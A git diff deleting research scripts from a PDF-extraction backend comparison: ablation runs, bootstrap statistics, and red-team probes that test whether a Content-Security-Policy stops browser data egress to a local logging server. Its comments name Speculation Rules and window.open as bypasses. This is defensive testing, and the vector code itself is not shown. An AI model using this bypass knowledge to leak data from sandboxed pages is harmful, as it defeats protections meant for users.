0.1}, - "F: space factor 0.25 -> 0.4": {"space": 0.4}, - "G: no chrome regexes at all": {"chrome_pat": True}, -} - - -def apply(cfg: dict): - """Mutate the module's constants; returns a restore callable.""" - saved = (R._BASELINE_TOL, R._SPACE_FACTOR, R._CHROME_SIZE_RATIO, R._CHROME_PATTERNS, R.cluster_lines) - if "tol" in cfg: - R._BASELINE_TOL = cfg["tol"] - if "space" in cfg: - R._SPACE_FACTOR = cfg["space"] - if "chrome_size" in cfg: - R._CHROME_SIZE_RATIO = cfg["chrome_size"] - if cfg.get("chrome_pat"): - R._CHROME_PATTERNS = () - if cfg.get("upright") is False: - orig = R.cluster_lines - - def no_upright(page): - kept = [g for g in page.glyphs if g[R.SIZE] > R._SIZE_FLOOR] - saved_glyphs = page.glyphs - page.glyphs = kept - try: - # Re-run the real clustering but without the upright filter, by - # temporarily marking every glyph upright. - page.glyphs = [g[:8] + (True,) for g in kept] - return orig(page) - finally: - page.glyphs = saved_glyphs - - R.cluster_lines = no_upright - - def restore(): - ( - R._BASELINE_TOL, - R._SPACE_FACTOR, - R._CHROME_SIZE_RATIO, - R._CHROME_PATTERNS, - R.cluster_lines, - ) = saved - - return restore - - -def main() -> None: - cache: dict = {} - refs: dict = {} - for doc in DOCS: - bill, stem = doc.split("/") - pdf = REPO / f"tests/corpus/{bill}/{stem}.pdf" - xml = REPO / f"tests/corpus/{bill}/{stem}.xml" - refs[doc] = (xml_body_tokens(xml), xml_heading_labels(xml)) - for b in ALL_BACKENDS: - cache[(doc, b)] = run_backend(b, pdf)[0] - print(f" extracted {doc}", file=sys.stderr) - - out: dict = {} - for name, cfg in ABLATIONS.items(): - restore = apply(cfg) - rep = cfg.get("repaired", True) - try: - rows = {} - for b in ALL_BACKENDS: - tf, hf = [], [] - for doc in DOCS: - xt, xh = refs[doc] - a, c = score(cache[(doc, b)], xt, xh, rep) - tf.append(a) - hf.append(c) - rows[b] = (statistics.mean(tf), statistics.mean(hf)) - finally: - restore() - out[name] = rows - order = sorted(rows, key=lambda b: -(rows[b][0] + rows[b][1])) - print(f"\n{name}") - print(f" {'backend':<15} {'text_f1':>8} {'head_f1':>8} rank") - for i, b in enumerate(order, 1): - print(f" {b:<15} {rows[b][0]:>8.4f} {rows[b][1]:>8.4f} {i}") - - dest = REPO / "docs/research/pdf-backend-bakeoff/results/redteam_ablation.json" - dest.write_text(json.dumps(out, indent=1)) - print(f"\nwrote {dest}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_csp_mitigation.py b/docs/research/pdf-backend-bakeoff/probes/redteam_csp_mitigation.py deleted file mode 100644 index e5c86fa5..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_csp_mitigation.py +++ /dev/null @@ -1,141 +0,0 @@ -"""Red-team follow-up: does removing 'unsafe-inline' actually close the Speculation Rules bypass? - -This backs the corrected CSP that RESULTS.md recommends, and it exists as a file because -the first version was run from a scratch script that was then deleted -- leaving the -document's central security recommendation with no reproducible probe. - -THE VACUOUS-PASS TRAP THIS PROBE EXISTS TO AVOID. The obvious test is to serve the same -fixture under `script-src 'self'` and count bypasses. Run that way it reports **zero -bypasses** -- and also `completed=False, 0 vectors`, because the policy blocked the -fixture's own INLINE bootstrap script and nothing ever executed. A zero from a page that -did not run is indistinguishable from a zero from a page that ran and was contained. - -So the mitigation variants load their bootstrap from an EXTERNAL file, and every variant -asserts `completed=True` with the full vector count before its bypass list is believed. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/redteam_csp_mitigation.py -""" - -from __future__ import annotations - -import argparse -import json -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -sys.path.insert(0, str(PROBES)) - -from redteam_egress2 import Server, run_case # noqa: E402 - -BASE = ( - "default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'none'; " - "form-action 'none'; base-uri 'none'; object-src 'none'; frame-src 'none'; " - "worker-src 'none'" -) - -# `inline` variants keep the original bootstrap and are expected to be VOID under a -# policy that forbids inline script -- kept in the matrix precisely to demonstrate the -# false pass rather than to hide it. -VARIANTS = { - "published policy (script-src 'self' 'unsafe-inline')": ( - BASE + "; script-src 'self' 'unsafe-inline'", - "inline", - ), - "VOID CONTROL: script-src 'self', inline bootstrap": (BASE + "; script-src 'self'", "inline"), - "corrected policy (script-src 'self', external bootstrap)": ( - BASE + "; script-src 'self'", - "external", - ), -} - -INLINE_PAGE = """ - -
running
- - -""" - -EXTERNAL_PAGE = """ - -
running
- - -""" - -BOOT = 'window.__tryAll2("{tag}").then(function(r){{document.getElementById("o").textContent=r+"\\nDONE";}});' - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument( - "--out", - type=Path, - default=REPO / "docs/research/pdf-backend-bakeoff/results/redteam_csp_mitigation.json", - ) - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - fx = PROBES / "egress-fixtures" - fx.mkdir(exist_ok=True) - (fx / "vectors2.js").write_text((PROBES / "vectors2.js").read_text()) - - results: dict = {"variants": {}} - with Server() as server, sync_playwright() as pw: - browser = pw.chromium.launch() - try: - for i, (name, (csp, boot)) in enumerate(VARIANTS.items()): - tag = f"mit{i}" - page_file = fx / f"mitigation_{i}.html" - if boot == "external": - (fx / "boot_mitigation.js").write_text(BOOT.format(tag=tag)) - page_file.write_text(EXTERNAL_PAGE.format(csp=csp, tag=tag)) - else: - page_file.write_text(INLINE_PAGE.format(csp=csp, tag=tag)) - - r = run_case(browser, server, page_file) - bypasses = sorted({h.split("/")[-1].split("?")[0] for h in r["hits"] if "/" in h}) - # A run that did not execute its vectors proves nothing, whatever its - # bypass count. Say so rather than recording a zero. - valid = r["completed"] and r["n_vectors"] >= 19 - results["variants"][name] = { - "csp": csp, - "bootstrap": boot, - "completed": r["completed"], - "n_vectors_run": r["n_vectors"], - "VALID": valid, - "bypasses": bypasses if valid else None, - "note": None if valid else "VOID: vectors did not run; zero is meaningless", - } - print( - f"{name:<56} valid={valid!s:<5} vectors={r['n_vectors']:2d} " - f"bypasses={bypasses if valid else 'VOID'}", - flush=True, - ) - finally: - browser.close() - - v = results["variants"] - pub = v["published policy (script-src 'self' 'unsafe-inline')"] - fix = v["corrected policy (script-src 'self', external bootstrap)"] - results["conclusion"] = { - "published_policy_bypasses": pub["bypasses"], - "corrected_policy_bypasses": fix["bypasses"], - "speculation_rules_closed": bool( - pub["bypasses"] - and fix["bypasses"] is not None - and any("speculation" in b for b in pub["bypasses"]) - and not any("speculation" in b for b in fix["bypasses"]) - ), - "remaining_outside_csp": [b for b in (fix["bypasses"] or []) if "windowopen" in b], - } - print("\n" + json.dumps(results["conclusion"], indent=1)) - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - print(f"wrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_egress2.py b/docs/research/pdf-backend-bakeoff/probes/redteam_egress2.py deleted file mode 100644 index bd84c4f2..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_egress2.py +++ /dev/null @@ -1,158 +0,0 @@ -"""Red-team item 9: run the second-round vectors against the PROPOSED PRODUCTION POLICY. - -Same discipline as the first harness: a no-CSP control must be observed to leak before -any zero elsewhere counts, and the claim is decided by what the SERVER received. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/redteam_egress2.py -""" - -from __future__ import annotations - -import argparse -import json -import subprocess -import sys -import threading -import time -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -PORT = 8973 - -# The exact policy RESULTS.md proposes. -STRICT_CSP = ( - "default-src 'none'; script-src 'self' 'unsafe-inline'; style-src 'unsafe-inline'; " - "img-src data:; connect-src 'none'; form-action 'none'; base-uri 'none'; " - "object-src 'none'; frame-src 'none'; worker-src 'none'" -) - -PAGE = """{title} -{csp} -
running
- - -""" - - -class Server: - def __init__(self): - self.proc = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "400"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(60): - if any("listening" in x for x in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("server did not start") - - def _drain(self): - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_e): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - @property - def mark(self): - return len(self.lines) - - def hits(self, mark: int) -> list[str]: - return [x.strip() for x in self.lines[mark:] if "EGRESS OBSERVED" in x] - - -def run_case(browser, server, path: Path) -> dict: - ctx = browser.new_context() - page = ctx.new_page() - mark = server.mark - page.goto(path.as_uri()) - report = "" - deadline = time.time() + 40 - while time.time() < deadline: - try: - report = page.eval_on_selector("#o", "e => e.textContent") - except Exception: # noqa: BLE001 - report = "" - if "DONE" in report: - break - time.sleep(0.25) - time.sleep(4) - hits = server.hits(mark) - for p in ctx.pages: - try: - p.close() - except Exception: # noqa: BLE001 - pass - ctx.close() - return { - "completed": "DONE" in report, - "n_vectors": report.count(":attempted") + report.count(":threw"), - "hits": hits, - "page_report": report, - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/redteam_egress2.json") - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - fx = PROBES / "egress-fixtures" - fx.mkdir(exist_ok=True) - (fx / "vectors2.js").write_text((PROBES / "vectors2.js").read_text()) - (fx / "rt2_nocsp.html").write_text(PAGE.format(title="rt2 no CSP", tag="rt2nocsp", csp="")) - (fx / "rt2_withcsp.html").write_text( - PAGE.format( - title="rt2 strict CSP", - tag="rt2csp", - csp=f'', - ) - ) - - results: dict = {"policy": STRICT_CSP} - with Server() as server, sync_playwright() as pw: - browser = pw.chromium.launch() - try: - ctl = run_case(browser, server, fx / "rt2_nocsp.html") - results["no_csp_control"] = ctl - print( - f"no-CSP control : {len(ctl['hits'])} observed, " - f"{ctl['n_vectors']} vectors, completed={ctl['completed']}", - flush=True, - ) - strict = run_case(browser, server, fx / "rt2_withcsp.html") - results["strict_csp"] = strict - print( - f"strict CSP : {len(strict['hits'])} observed, " - f"{strict['n_vectors']} vectors, completed={strict['completed']}", - flush=True, - ) - finally: - browser.close() - - def names(hits): - return sorted({h.split("/")[-1].split("?")[0] for h in hits if "/" in h}) - - results["control_vectors_that_leaked"] = names(results["no_csp_control"]["hits"]) - results["POLICY_BYPASSES"] = names(results["strict_csp"]["hits"]) - print("\ncontrol leaked :", results["control_vectors_that_leaked"]) - print("POLICY BYPASSES:", results["POLICY_BYPASSES"] or "none") - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_unguarded.py b/docs/research/pdf-backend-bakeoff/probes/redteam_unguarded.py deleted file mode 100644 index 1cfebf9f..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_unguarded.py +++ /dev/null @@ -1,85 +0,0 @@ -"""Red-team: score the two pairs the production guard declines, WITHOUT the guard. - -The published Phase 2 table is 13 of 15 pairs. Excluding pairs after seeing results is -exactly the kind of move that can manufacture a parity result, so the excluded pairs are -scored here explicitly and reported alongside, rather than only argued about. - -If PDFium-WASM's parity with the incumbent holds on the declined pairs too, the exclusion -cannot be what produced it. -""" - -from __future__ import annotations - -import json -import sys -import traceback -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import ALL_BACKENDS, run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase2 import amount_triples, change_signatures, prf, xml_canonical # noqa: E402 - -from deltatrack.diff_pdf import diff_pdfs # noqa: E402 -from deltatrack.formatters.canonical import pdf_diff_to_canonical # noqa: E402 -from deltatrack.parsers.pdf_text import pdf_full_text # noqa: E402 - -DECLINED = [ - ("115-hr-5895", "4_engrossed-amendment-senate", "5_enrolled-bill"), - ("118-hr-4366", "5_engrossed-amendment-house", "6_enrolled-bill"), -] - - -def main() -> None: - out: dict = {"note": "guard DISABLED; these are the pairs production declines", "pairs": {}} - for bill, a, b in DECLINED: - key = f"{bill}/{a}->{b}" - out["pairs"][key] = {} - xml_canon = xml_canonical(REPO / f"tests/corpus/{bill}/{a}.xml", REPO / f"tests/corpus/{bill}/{b}.xml") - inc = None - for backend in [b_ for b_ in ALL_BACKENDS]: - try: - pages = {} - for side, stem in (("v1", a), ("v2", b)): - raw, _ = run_backend(backend, REPO / f"tests/corpus/{bill}/{stem}.pdf") - pages[side], _ = reconstruct(raw, repaired=True) - diff = diff_pdfs(pages["v1"], pages["v2"]) # NO GUARD, deliberately - t1, o1 = pdf_full_text(pages["v1"]) - t2, o2 = pdf_full_text(pages["v2"]) - congress, chamber, number = bill.split("-") - canon = pdf_diff_to_canonical( - diff, - bill_type=chamber, - bill_number=number, - congress=congress, - full_text={"v1": t1, "v2": t2}, - line_offsets={"v1": o1, "v2": o2}, - ) - if backend == "pdfium-native": - inc = canon - entry = { - "vs_xml_amounts": prf(amount_triples(xml_canon), amount_triples(canon)), - "n_changes": len(canon.get("changes") or []), - } - if inc is not None and backend != "pdfium-native": - entry["identical_amounts"] = amount_triples(inc) == amount_triples(canon) - entry["identical_changes"] = change_signatures(inc) == change_signatures(canon) - entry["vs_incumbent_amounts"] = prf(amount_triples(inc), amount_triples(canon)) - out["pairs"][key][backend] = entry - print(f" {key:<40} {backend:<15} {json.dumps(entry)[:150]}", flush=True) - except Exception as exc: - out["pairs"][key][backend] = {"error": f"{type(exc).__name__}: {exc}"} - print(f" {key:<40} {backend:<15} ERROR {exc}", flush=True) - traceback.print_exc() - dest = REPO / "docs/research/pdf-backend-bakeoff/results/redteam_unguarded.json" - dest.write_text(json.dumps(out, indent=1, default=str)) - print(f"wrote {dest}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_validate_amounts.py b/docs/research/pdf-backend-bakeoff/probes/redteam_validate_amounts.py deleted file mode 100644 index 7b16e6c8..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_validate_amounts.py +++ /dev/null @@ -1,148 +0,0 @@ -"""Red-team item 7: separate "identical to the incumbent" from "correct". - -PDFium-WASM reproducing pypdfium2 exactly says nothing about whether either is RIGHT. -If the incumbent mis-reads an amount, its WASM twin mis-reads it identically and the -parity metric records a perfect score. - -So a random sample of the PDF-derived amount entries is validated against the source -document through a path that shares NOTHING with the pipeline under test: - - * text comes from PyMuPDF's own `get_text()` -- a different library, its own text - assembly, not the neutral glyph layer; - * the check is that the claimed old value appears on the v1 page and the claimed new - value on the v2 page, at the location the canonical diff points to. - -A failure here is a real accuracy defect. A pass does not prove the diff is semantically -right, only that the numbers it reports are numbers actually printed in the documents. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/redteam_validate_amounts.py -""" - -from __future__ import annotations - -import json -import random -import re -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase2 import pdf_canonical # noqa: E402 - -SEED = 20260805 # fixed so the sample is reproducible - - -def independent_text(pdf: Path) -> str: - """Whole-document text via PyMuPDF's OWN api -- not the neutral layer under test.""" - import pymupdf - - doc = pymupdf.open(str(pdf)) - try: - return "\n".join(doc[i].get_text() for i in range(doc.page_count)) - finally: - doc.close() - - -def variants(amount: str) -> list[str]: - """Surface forms the same amount can take in printed GPO text. - - The canonical contract stores amounts as INTEGERS (194000000) while the page prints - "$194,000,000". A first version of this check compared the integer against raw page - text and reported 0/43 -- a check structurally incapable of matching, which looks - exactly like a catastrophic accuracy failure. Both sides are stripped of $ and commas - instead. - """ - a = str(amount).strip().replace("$", "").replace(",", "") - return [a] if a else [] - - -def strip_money(text: str) -> str: - """Remove $ and thousands separators so integer amounts can be found literally.""" - return re.sub(r"[,$]", "", text) - - -def main() -> None: - pair = ("118-hr-4366", "3_placed-on-calendar-senate", "4_engrossed-amendment-senate") - bill, a, b = pair - p1 = REPO / f"tests/corpus/{bill}/{a}.pdf" - p2 = REPO / f"tests/corpus/{bill}/{b}.pdf" - - print(f"pair: {bill}/{a} -> {b}", flush=True) - canon, _ = pdf_canonical("pdfium-wasm", p1, p2, bill, "repaired") - - entries = [] - for ch in canon.get("changes") or []: - for e in ch.get("amount_entries") or []: - entries.append(e) - print(f"PDFium-WASM produced {len(entries)} amount entries", flush=True) - - rng = random.Random(SEED) - sample = rng.sample(entries, min(40, len(entries))) - - print("building independent reference text via PyMuPDF get_text() ...", flush=True) - t1 = independent_text(p1) - t2 = independent_text(p2) - # GPO prints amounts with commas; normalize whitespace only. - t1n = strip_money(re.sub(r"\s+", " ", t1)) - t2n = strip_money(re.sub(r"\s+", " ", t2)) - - ok_old = ok_new = 0 - n_old = n_new = 0 - failures = [] - for e in sample: - old, new, kind = e.get("old"), e.get("new"), e.get("kind") - if old: - n_old += 1 - hit = any(v in t1n for v in variants(str(old))) - ok_old += hit - if not hit: - failures.append(("old-not-in-v1", kind, old, new)) - if new: - n_new += 1 - hit = any(v in t2n for v in variants(str(new))) - ok_new += hit - if not hit: - failures.append(("new-not-in-v2", kind, old, new)) - - print() - print(f"sample n={len(sample)} entries (seed {SEED})") - print(f" claimed OLD value found in v1 source text: {ok_old}/{n_old}") - print(f" claimed NEW value found in v2 source text: {ok_new}/{n_new}") - if failures: - print(f" FAILURES ({len(failures)}):") - for f in failures[:12]: - print(" ", f) - else: - print(" no failures: every sampled amount is genuinely printed in the source side it is claimed for") - - dest = REPO / "docs/research/pdf-backend-bakeoff/results/redteam_amount_validation.json" - dest.write_text( - json.dumps( - { - "pair": f"{bill}/{a}->{b}", - "seed": SEED, - "n_entries_total": len(entries), - "n_sampled": len(sample), - "old_found": ok_old, - "old_checked": n_old, - "new_found": ok_new, - "new_checked": n_new, - "failures": failures, - "reference": "PyMuPDF get_text(), independent of the neutral glyph layer", - }, - indent=1, - default=str, - ) - ) - print(f"wrote {dest}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/report_confirmatory.py b/docs/research/pdf-backend-bakeoff/probes/report_confirmatory.py deleted file mode 100644 index fb6d5306..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/report_confirmatory.py +++ /dev/null @@ -1,351 +0,0 @@ -"""Concern B statistics: paired cluster bootstrap by bill, thresholds, and the B0 rows. - -PRE-REGISTRATION-CONFIRMATORY.md, "Statistics: paired cluster bootstrap by bill" and -"Practical-effect thresholds". - - Delta = score(pdfminer) - score(pdfium-wasm), paired per document, defined once here and - never inverted. Positive Delta favours pdfminer. - - Resampling unit is the BILL, with replacement, all of a sampled bill's documents - travelling together. The statistic is the per-bill mean of the paired per-document - Delta, then the unweighted mean over sampled bills, so one 6-document bill cannot - dominate 30 clusters. Document-weighted aggregation is reported as a sensitivity check. - - A backend LEADS only if the 95% CI excludes zero AND |Delta| reaches the metric's - practical threshold. Overlapping independent CIs are not evidence and are not computed. - -A metric whose deciding sabotage does not move it past its own threshold is VOID: its -Delta is printed but marked, and it may not be cited as evidence. That check runs first, -because a Delta table without its B0 row is not reviewable. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/report_confirmatory.py \ - --results docs/research/pdf-backend-bakeoff/results/confirm_p1.json -""" - -from __future__ import annotations - -import argparse -import json -import random -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_sabotage as SAB # noqa: E402 - -SEED = 20260805 -RESAMPLES = 10_000 - -# Frozen before any confirmatory result was visible. See the preregistration for the -# per-metric justification; these are not tunable here. -THRESHOLDS = {"B1": 0.010, "B2": 0.020, "B3a": 0.005, "B5": 0.010, "B6": 0.020} - -# (metric -> how to pull its scalar out of a scored document) -FIELD = { - "B1": ("B1", "f1"), - "B2": ("B2", "f1"), - "B3a": ("B3a", "score"), - "B5": ("B5", "f1"), - "B6": ("B6", "accuracy"), -} - -CANDIDATES = ("pdfium-wasm", "pdfminer") - - -def scalar(doc_results: dict, backend: str, mode: str, metric: str) -> float | None: - entry = doc_results.get(backend, {}).get(mode) - if not entry or "error" in entry: - return None - block, field = FIELD[metric] - val = entry.get(block, {}).get(field) - return None if val is None else float(val) - - -def paired_deltas(docs: dict, mode: str, metric: str, keys: list[str]) -> dict[str, list[float]]: - """{bill: [per-document Delta]} for documents where BOTH candidates scored.""" - by_bill: dict[str, list[float]] = {} - for key in keys: - entry = docs[key] - res = entry.get("results") or {} - a = scalar(res, "pdfminer", mode, metric) - b = scalar(res, "pdfium-wasm", mode, metric) - if a is None or b is None: - continue - by_bill.setdefault(entry["bill"], []).append(a - b) - return by_bill - - -def cluster_bootstrap(by_bill: dict[str, list[float]]) -> dict: - bills = sorted(by_bill) - if len(bills) < 2: - return {"point": None, "ci": None, "n_bills": len(bills), "n_documents": sum(len(v) for v in by_bill.values())} - per_bill = {b: statistics.mean(by_bill[b]) for b in bills} - point = statistics.mean(per_bill[b] for b in bills) - - rng = random.Random(SEED) - draws = [] - n = len(bills) - for _ in range(RESAMPLES): - sample = [per_bill[bills[rng.randrange(n)]] for _ in range(n)] - draws.append(sum(sample) / n) - draws.sort() - lo = draws[int(0.025 * RESAMPLES)] - hi = draws[int(0.975 * RESAMPLES) - 1] - - flat = [d for v in by_bill.values() for d in v] - n_differing = sum(1 for d in flat if abs(d) > 1e-9) - return { - "point": round(point, 5), - "ci": [round(lo, 5), round(hi, 5)], - "excludes_zero": bool(lo > 0 or hi < 0), - "n_bills": n, - "n_documents": len(flat), - "n_documents_differing": n_differing, - # A [0, 0] interval means NO DOCUMENT DIFFERED, which is a different statement from - # "the differences cancelled out" and must not be read as the latter. Where it also - # holds that every document capable of differing was excluded by a stratum rule, the - # metric had no chance to discriminate and "indistinguishable" is not evidence of - # similarity -- see the B2 note in RESULTS-CONFIRMATORY.md. - "degenerate_all_zero": n_differing == 0, - "doc_weighted_point": round(statistics.mean(flat), 5), - } - - -def verdict(stat: dict, metric: str, void: bool) -> str: - if void: - return "VOID (control did not fire)" - if stat["point"] is None: - return "insufficient data" - th = THRESHOLDS[metric] - sig = stat["excludes_zero"] - prac = abs(stat["point"]) >= th - who = "pdfminer" if stat["point"] > 0 else "pdfium-wasm" - if sig and prac: - return f"{who} LEADS" - if sig and not prac: - return "statistically distinguishable, practically indistinguishable" - if not sig and prac: - return "practically large but CI includes zero -- not established" - if stat.get("degenerate_all_zero"): - return "identical on every document (not merely indistinguishable)" - return "indistinguishable" - - -def b0_rows(docs: dict, mode: str, keys: list[str]) -> dict: - """Did each deciding control move its own metric past that metric's threshold?""" - out = {} - for metric, sid in SAB.DECIDING.items(): - deltas, others = [], [] - for key in keys: - res = docs[key].get("results") or {} - base = scalar(res, "pdfium-wasm", mode, metric) - sab = scalar(res, sid, mode, metric) - if base is None or sab is None: - continue - deltas.append(base - sab) - b2b = scalar(res, "pdfium-wasm", mode, "B2") - b2s = scalar(res, sid, mode, "B2") - if b2b is not None and b2s is not None: - others.append(b2b - b2s) - if not deltas: - out[metric] = {"control": sid, "delta": None, "fires": False, "n": 0} - continue - d = statistics.mean(deltas) - out[metric] = { - "control": sid, - "delta": round(d, 5), - "threshold": THRESHOLDS[metric], - "fires": bool(d >= THRESHOLDS[metric]), - "n": len(deltas), - "b2_delta": round(statistics.mean(others), 5) if others else None, - } - return out - - -def separability(docs: dict, mode: str, keys: list[str]) -> list[dict]: - rows = [] - for sid, own_m, other_m, rule, lim in SAB.SEPARABILITY: - own, other = [], [] - for key in keys: - res = docs[key].get("results") or {} - for metric, acc in ((own_m, own), (other_m, other)): - b = scalar(res, "pdfium-wasm", mode, metric) - s = scalar(res, sid, mode, metric) - if b is not None and s is not None: - acc.append(b - s) - if not own or not other: - rows.append({"control": sid, "verdict": "insufficient data"}) - continue - a, o = statistics.mean(own), statistics.mean(other) - ok = (o < lim) if rule == "threshold" else (o < a) - rows.append( - { - "control": sid, - "own_metric": own_m, - "own_delta": round(a, 5), - "other_metric": other_m, - "other_delta": round(o, 5), - "rule": rule, - "limit": lim, - "verdict": "SEPARABLE" if ok else "NOT SEPARABLE", - } - ) - return rows - - -def repair_delta(docs: dict, keys: list[str]) -> dict: - out = {} - for backend in CANDIDATES: - vals = [] - for key in keys: - res = docs[key].get("results") or {} - s = scalar(res, backend, "strict", "B1") - r = scalar(res, backend, "repaired", "B1") - if s is not None and r is not None: - vals.append(r - s) - out[backend] = round(statistics.mean(vals), 5) if vals else None - return out - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--results", type=Path, required=True) - ap.add_argument("--mode", default="strict", choices=("strict", "repaired")) - ap.add_argument("--out", type=Path, default=None) - args = ap.parse_args() - - raw = json.loads(args.results.read_text()) - docs = raw["documents"] - pop = raw["population"] - - def accepted(key: str) -> bool: - res = docs[key].get("results") or {} - return res.get("pdfium-wasm", {}).get("production_accepted") is True - - strata = { - "primary (production-accepted)": [k for k in docs if accepted(k)], - "production-declined": [k for k in docs if not accepted(k)], - } - qb = [k for k in docs if docs[k].get("quoted_block")] - strata["primary, quoted-block-free (B2/B5/B6)"] = [ - k for k in strata["primary (production-accepted)"] if k not in qb - ] - strata["primary, quoted-block (B2/B5/B6)"] = [k for k in strata["primary (production-accepted)"] if k in qb] - - report = { - "population": pop, - "source": str(args.results.name), - "mode": args.mode, - "seed": SEED, - "resamples": RESAMPLES, - "delta_definition": "score(pdfminer) - score(pdfium-wasm); positive favours pdfminer", - "n_documents": len(docs), - "strata_sizes": {k: len(v) for k, v in strata.items()}, - } - - primary = strata["primary (production-accepted)"] - report["B0"] = b0_rows(docs, args.mode, primary) - report["separability"] = separability(docs, args.mode, primary) - report["repair_delta_B1"] = repair_delta(docs, primary) - - results = {} - for metric in FIELD: - keys = strata["primary, quoted-block-free (B2/B5/B6)"] if metric in ("B2", "B5", "B6") else primary - stat = cluster_bootstrap(paired_deltas(docs, args.mode, metric, keys)) - void = not report["B0"].get(metric, {}).get("fires", False) - stat["verdict"] = verdict(stat, metric, void) - stat["threshold"] = THRESHOLDS[metric] - stat["stratum"] = "quoted-block-free" if metric in ("B2", "B5", "B6") else "production-accepted" - results[metric] = stat - report["delta"] = results - - # The quoted-block stratum for B2/B5/B6, reported because the primary stratum is - # known to be non-discriminating on this corpus: every P1 document where the two - # backends' heading recovery differs carries , and the exclusion that - # protects B2 from the DeltaTrack#11 reference defect removes all of them. Publishing - # only "identical on every document" would read as evidence of similarity when the - # metric in fact had no opportunity to fire. - secondary = {} - for metric in ("B2", "B5", "B6"): - keys = strata["primary, quoted-block (B2/B5/B6)"] - stat = cluster_bootstrap(paired_deltas(docs, args.mode, metric, keys)) - stat["threshold"] = THRESHOLDS[metric] - stat["stratum"] = "quoted-block (XML reference carries a known parser drop)" - stat["caveat"] = ( - "The XML reference under-reports here (DeltaTrack#11), so this is not a clean " - "accuracy comparison. It is reported because the clean stratum cannot discriminate." - ) - secondary[metric] = stat - report["delta_quoted_block_stratum"] = secondary - - # Absolute per-backend means, for context. Never a ranking on their own. - means = {} - for backend in CANDIDATES + ("pdfium-native",): - means[backend] = {} - for metric in FIELD: - keys = strata["primary, quoted-block-free (B2/B5/B6)"] if metric in ("B2", "B5", "B6") else primary - vals = [scalar(docs[k].get("results") or {}, backend, args.mode, metric) for k in keys] - vals = [v for v in vals if v is not None] - means[backend][metric] = round(statistics.mean(vals), 5) if vals else None - report["means"] = means - - print(f"\n=== {pop.upper()} / {args.mode} mode ===") - print(f"documents {len(docs)} strata: " + ", ".join(f"{k}={len(v)}" for k, v in strata.items())) - - print("\nB0 -- did each control fire?") - print(f" {'metric':6} {'control':6} {'delta':>9} {'threshold':>10} verdict") - for m, r in report["B0"].items(): - d = "n/a" if r["delta"] is None else f"{r['delta']:+.4f}" - fired = "FIRES" if r["fires"] else "DID NOT FIRE -> metric VOID" - print(f" {m:6} {r['control']:6} {d:>9} {r.get('threshold', 0):>10} {fired}") - - print("\nSeparability") - for r in report["separability"]: - if r.get("verdict") == "insufficient data": - print(f" {r['control']}: insufficient data") - continue - print( - f" {r['control']}: {r['own_metric']} {r['own_delta']:+.4f} vs " - f"{r['other_metric']} {r['other_delta']:+.4f} -> {r['verdict']}" - ) - - print(f"\nDelta = pdfminer - pdfium-wasm ({RESAMPLES} cluster resamples by bill, seed {SEED})") - print(f" {'metric':6} {'pdfium':>8} {'pdfmnr':>8} {'delta':>9} {'95% CI':>20} {'thresh':>7} verdict") - for m, s in report["delta"].items(): - if s["point"] is None: - print(f" {m:6} insufficient data") - continue - ci = f"[{s['ci'][0]:+.4f}, {s['ci'][1]:+.4f}]" - pw = means["pdfium-wasm"][m] - pm = means["pdfminer"][m] - a = " n/a" if pw is None else f"{pw:8.4f}" - b = " n/a" if pm is None else f"{pm:8.4f}" - n = f"{s['n_documents_differing']}/{s['n_documents']}" - print(f" {m:6} {a} {b} {s['point']:+9.4f} {ci:>20} {s['threshold']:>7} {n:>7} differ {s['verdict']}") - - print("\nB2/B5/B6 on the QUOTED-BLOCK stratum (reference is known-defective there,") - print("reported because the clean stratum above cannot discriminate at all):") - 